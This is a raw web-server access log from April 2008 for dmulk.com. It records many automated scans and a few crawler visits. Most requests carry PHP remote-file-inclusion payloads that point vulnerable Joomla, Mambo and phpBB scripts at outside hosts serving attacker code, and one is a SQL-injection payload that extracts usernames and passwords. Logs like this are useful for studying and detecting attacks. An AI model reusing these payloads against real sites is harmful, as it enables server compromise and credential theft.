207.61.144.44 - - [23/Apr/2008:10:19:17 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.186.1.54 - - [23/Apr/2008:10:19:27 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [23/Apr/2008:10:19:27 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [23/Apr/2008:10:19:28 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:19:31 -0700] "GET /logs/access_080215.log//account.php?action=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:19:32 -0700] "GET //account.php?action=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:19:32 -0700] "GET /logs//account.php?action=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.3.139.246 - - [23/Apr/2008:10:19:41 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.3.139.246 - - [23/Apr/2008:10:19:41 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.25.195.66 - - [23/Apr/2008:10:19:55 -0700] "GET /logs/home.php?x=http://www.deyaa.net//images/gif/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
209.25.195.66 - - [23/Apr/2008:10:19:57 -0700] "GET /home.php?x=http://www.deyaa.net//images/gif/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.3.139.246 - - [23/Apr/2008:10:20:12 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.91.224.9 - - [23/Apr/2008:10:20:12 -0700] "GET /blog/index.php/2008/04/03/hello-world/ HTTP/1.1" 200 7188 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.dmulk.com"
62.112.193.46 - - [23/Apr/2008:10:20:34 -0700] "GET /logs/access_071218.log/modules/EN-Forums/db/mysql.php?phpbb_root_path=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [23/Apr/2008:10:20:34 -0700] "GET /modules/EN-Forums/db/mysql.php?phpbb_root_path=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [23/Apr/2008:10:20:34 -0700] "GET /logs/modules/EN-Forums/db/mysql.php?phpbb_root_path=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [23/Apr/2008:10:20:35 -0700] "GET /logs/access_071231.log/modules/EN-Forums/db/mysql.php?phpbb_root_path=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.149.242.164 - - [23/Apr/2008:10:20:42 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.trepamontes4x4.com/digi/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.130.234 - - [23/Apr/2008:10:20:58 -0700] "GET /logs/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x4861636B20427920436176616C657261,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
70.86.130.234 - - [23/Apr/2008:10:21:01 -0700] "GET /index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x4861636B20427920436176616C657261,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 200 11602 "-" "libwww-perl/5.811" "dmulk.com"
69.57.130.70 - - [23/Apr/2008:10:21:16 -0700] "GET /classes/core/language.php?rootdir=http://demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.112.193.46 - - [23/Apr/2008:10:21:41 -0700] "GET /logs/access_071227.log//components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [23/Apr/2008:10:21:42 -0700] "GET //components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.3.139.246 - - [23/Apr/2008:10:21:42 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.112.193.46 - - [23/Apr/2008:10:21:42 -0700] "GET /logs//components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:21:53 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.89 - - [23/Apr/2008:10:22:29 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.21.121 - - [23/Apr/2008:10:22:29 -0700] "GET /logs/access_070626.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:22:29 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:22:29 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:22:29 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:22:46 -0700] "GET /logs/access.log/index1.php?x=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:22:46 -0700] "GET /index1.php?x=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:22:46 -0700] "GET /logs/index1.php?x=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.112.193.46 - - [23/Apr/2008:10:22:53 -0700] "GET /logs/access_080324.log//components/com_flyspray/startdown.php?file=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [23/Apr/2008:10:22:53 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [23/Apr/2008:10:22:54 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
90.183.251.27 - - [23/Apr/2008:10:23:02 -0700] "GET /logs/access_071225.log/skin/zero_vote/error.php?dir=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
90.183.251.27 - - [23/Apr/2008:10:23:02 -0700] "GET /skin/zero_vote/error.php?dir=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
90.183.251.27 - - [23/Apr/2008:10:23:03 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
62.112.193.46 - - [23/Apr/2008:10:23:09 -0700] "GET /logs/access_080204.log//components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:23:13 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:23:14 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:23:14 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.25.195.66 - - [23/Apr/2008:10:23:25 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.deyaa.net//images/gif/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
209.25.195.66 - - [23/Apr/2008:10:23:26 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.deyaa.net//images/gif/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:23:32 -0700] "GET /logs/access_080313.log/index1.php?x=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.9.83.84 - - [23/Apr/2008:10:23:39 -0700] "GET //mcf.php?content=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.54.21.194 - - [23/Apr/2008:10:23:40 -0700] "GET //mcf.php?content=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
74.54.21.194 - - [23/Apr/2008:10:23:40 -0700] "GET /logs//mcf.php?content=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:10:23:55 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:10:23:55 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:10:23:55 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.242.164 - - [23/Apr/2008:10:24:15 -0700] "GET /logs/access_080218.log//skin/zero_vote/error.php?dir=http://www.trepamontes4x4.com/digi/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.50.211.121 - - [23/Apr/2008:10:24:21 -0700] "GET /logs/http://www.trepamontes4x4.com/digi/menu? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
69.50.211.121 - - [23/Apr/2008:10:24:22 -0700] "GET /http://www.trepamontes4x4.com/digi/menu? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:24:23 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:10:24:24 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:10:24:25 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:10:24:26 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:10:24:28 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.69" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:10:24:28 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:10:24:29 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.69" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:10:24:29 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.69" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:10:24:29 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:10:24:29 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.6.18.93 - - [23/Apr/2008:10:24:30 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.52.29 - - [23/Apr/2008:10:24:34 -0700] "GET /blog/index.php/category/motorcycles/ HTTP/1.0" 200 10609 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:24:40 -0700] "GET /index1.php?x=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.34.124.100 - - [23/Apr/2008:10:24:57 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
64.34.124.100 - - [23/Apr/2008:10:25:02 -0700] "GET //index.php?option=com_custompages&cpage=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:10:25:46 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.quotationsforlife.com/????? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:10:25:46 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.quotationsforlife.com/????? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:10:25:46 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.quotationsforlife.com/????? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.29.18 - - [23/Apr/2008:10:25:59 -0700] "GET /logs/access_080218.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
24.93.105.27 - - [23/Apr/2008:10:26:00 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.54.129.234 - - [23/Apr/2008:10:26:28 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.166.61.155 - - [23/Apr/2008:10:26:29 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
219.166.61.155 - - [23/Apr/2008:10:26:29 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
80.67.27.166 - - [23/Apr/2008:10:26:45 -0700] "GET /logs/index.php?option=com_attend_events&task=&Itemid=&mosConfig_absolute_path=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
80.67.27.166 - - [23/Apr/2008:10:26:46 -0700] "GET /index.php?option=com_attend_events&task=&Itemid=&mosConfig_absolute_path=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:10:26:59 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.quotationsforlife.com/????? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:10:27:06 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:10:27:15 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:10:27:16 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.69" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:10:27:17 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.53.197.2 - - [23/Apr/2008:10:27:27 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [23/Apr/2008:10:27:28 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [23/Apr/2008:10:27:28 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.176.161.208 - - [23/Apr/2008:10:27:37 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.176.161.208 - - [23/Apr/2008:10:27:38 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.176.161.208 - - [23/Apr/2008:10:27:38 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.192.125.88 - - [23/Apr/2008:10:27:40 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.terravitagolfclub.com/weather/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
210.192.125.88 - - [23/Apr/2008:10:27:44 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.terravitagolfclub.com/weather/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
87.106.103.122 - - [23/Apr/2008:10:27:48 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.eq2arena.com/content/data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.103.122 - - [23/Apr/2008:10:27:48 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.eq2arena.com/content/data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:28:06 -0700] "GET /?confdir=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.103.122 - - [23/Apr/2008:10:28:16 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.eq2arena.com/content/data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
90.183.251.27 - - [23/Apr/2008:10:28:31 -0700] "GET /logs/access.log/skin/zero_vote/error.php?dir=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:28:40 -0700] "GET /logs/access_080115.log//config.inc.php?path_escape=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:28:40 -0700] "GET //config.inc.php?path_escape=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:28:41 -0700] "GET /logs//config.inc.php?path_escape=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.34.124.100 - - [23/Apr/2008:10:28:55 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
64.34.124.100 - - [23/Apr/2008:10:28:56 -0700] "GET //index.php?option=com_custompages&cpage=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:10:29:06 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:29:06 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:29:06 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
